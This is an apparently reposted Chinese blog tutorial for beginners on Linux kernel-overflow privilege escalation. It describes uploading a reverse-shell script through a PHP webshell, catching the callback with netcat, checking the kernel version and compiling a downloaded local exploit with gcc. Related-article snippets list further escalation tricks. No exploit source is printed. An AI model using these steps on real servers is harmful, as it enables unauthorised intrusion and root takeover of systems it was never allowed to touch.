linux溢出提权(适合刚学习linux提权的朋友)

最新推荐文章于 2024-08-11 17:18:24 发布
最新推荐文章于 2024-08-11 17:18:24 发布
阅读量2.4k 收藏
点赞数
分类专栏: webshell 提权 linux 文章标签: linux shell 脚本 gcc 2010
提权 同时被 3 个专栏收录
26 篇文章 0 订阅
订阅专栏
webshell
18 篇文章 0 订阅
订阅专栏
linux
6 篇文章 0 订阅
订阅专栏
本帖最后由 wjs 于 2010-4-3 14:26 编辑 

作者wjs
qq 825680101

我也是刚接触linux,谢谢师傅sunwear的指导。
先在网站目录上传1.pl,是个反弹脚本
Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0

然后执行 ./1.pl 本机IP 1224

然后本机监听nc -vv -l -p 1224,图1 反弹成功

输入id
bash-3.2$ id
uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
bash-3.2$
这里uid=529(zeicom)还不是root权限,输入uname –r
返回:2.6.18-164.11.1.el5PAE

找对应的exp, 这里地址整理很齐全可以这里下
http://sebug.net/paper/linux_exp/ {此处经本人更改}

命令输入pwd,这个命令是显示当前目录,当前目录就是shell的目录,我在shell上传2.c
然后命令输入
Gcc –o 2 2.c  //把2.c编译成可执行文件
chmod +x 2 //给2有执行权限
./2 //执行2,2是溢出的 exp文件。图2
  

看图可以发现没提权成功,过程就是这样。以后遇到linux可以这样提权。不会linux提权的朋友可以学习下,会有所收获的 

fengling132
关注
专栏目录
Linux提权
liver100day的博客
11-16 4500
文章目录Linux提权1.1 sudo提权1.2 suid提权1.3 计划任务cron1.4 内核漏洞提权2.4.4 Linux_Exploit_Suggester(提权辅助工具)2.5 利用可写文件2.6、明文root密码提权2.7、密码复用2.8 查看用户最后编辑的文件2.9 查找敏感文件2.10 用grep查找有密码的文件后言 Linux提权 linux权限划分没有windows的复杂,提权只需要从普通权限提升到root权限就可以了。 1.1 sudo提权 先进行尝试sudo su,查看是否为空密码
Linux提权简单总结
Aiwin的博客
08-10 2359
Linux提权简单总结
Linux常见提权方式
最新发布
L_erAry的博客
08-11 1376
taskset命令用于设置进程(或 线程)的处理器亲和性(Processor Affinity),可以将进程(或 线程)绑定到特定的一个 或 多个CPU上去执行,而不允许将进程(或 线程)调度到其他的CPU上。在Linux/Unix中,/etc/sudoers文件是sudo权限的配置文件,其中储存了一些用户或组可以以root权限使用的命令。使用方法是,创建一个临时的文件,并在其中构建一个包来调用/bin/bash,然后通过apt-get安装该包。通过压缩一个存在的文件,并调用-T参数输出shell
linux溢出提权
weixin_30410119的博客
03-17 205
先在网站目录上传1.pl,是个反弹脚本Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0 然后执行 ./1.pl 本机IP 1224接着本机监听nc -vv -l -p 1224,图1 反弹成功 输入idbash-3.2$ iduid=529(zeicom) gid=525(zeicom) groups=525(zeicom)bash-3.2$这里uid=529(...
内网渗透之——linux本地漏洞提权之——溢出提权
wsnbbz的博客
03-10 1197
利用系统内核提权漏洞基本思路 1.判断系统版本 uname -a(Linux查看操作系统内核信息) cat /proc/version (Linux查看当前操作系统版本信息) cat /etc/issue或cat /etc/redhat-release(Linux查看版本当前操作系统发行版信息) 2.根据内核版本去找对应的exp 3.获取交互式shell...
Linux提权扫描脚本
04-28
这篇文档将深入探讨Linux提权扫描的相关知识点,包括提权原理、常见提权方法、提权扫描脚本的工作机制以及如何编写和使用这样的脚本。 一、提权原理 在Linux系统中,权限分为三类:用户权限、组权限和所有者权限。...
Linux溢出提权教程
03-08
通过学习本教程,读者将对Linux溢出提权有深入的理解,并能掌握相关技能,无论是用于防御还是进攻,都能在实际环境中更好地应对缓冲区溢出威胁。 不过,值得注意的是,此教程的压缩包文件列表中包含了一个名为"33....
linux 2.6.17 提权
07-04
Linux系统中,"提权"是指通过某种方式获取比当前用户权限更高的权限,通常是从普通用户提升到管理员(root)权限。对于标题和描述提到的"Linux 2.6.17 提权",这可能涉及到的是针对该特定内核版本的安全漏洞利用。...
linux提权代码
06-04
Linux系统中,“提权”是指提升用户权限的过程,通常从普通用户权限升级到管理员(root)权限。这是因为Linux是一个多用户、多任务的操作系统,为了安全考虑,它对不同用户的权限进行了严格的划分。提权在系统管理...
webshell提权教程linux,Linux下WEBSHELL提权
weixin_42379854的博客
05-05 826
用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。前提:1、目标机上安装了GCC能编译源码2、Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)因为是在webshell溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把当前运行...
Linux提权大全
yggcwhat
05-14 9503
Linux提权大全
Linux权限提升总结_linux 提权
2401_84968977的博客
05-17 1029
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
linux提权
qq_42307546的博客
04-13 3117
常用命令 uname -a #查看内核/操作系统/cpu信息 hend -n 1 /etc/issue #查看操作系统版本 cat /proc/version #查看系统信息 hostname #查看计算机名 env #查看环境变量 ifconfig #查看网卡 netstat -lntp # 查看所有监听端口 netstat -antp # 查看所有已经建立的连接 netstat -s # 查看网络统计信息 iptables -L #查看防火墙设置 route -n # 查看路由表 ps -ef # 查.
Linux 提权
qq_53742230的博客
07-17 2903
Linux 的一些常用提权手法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值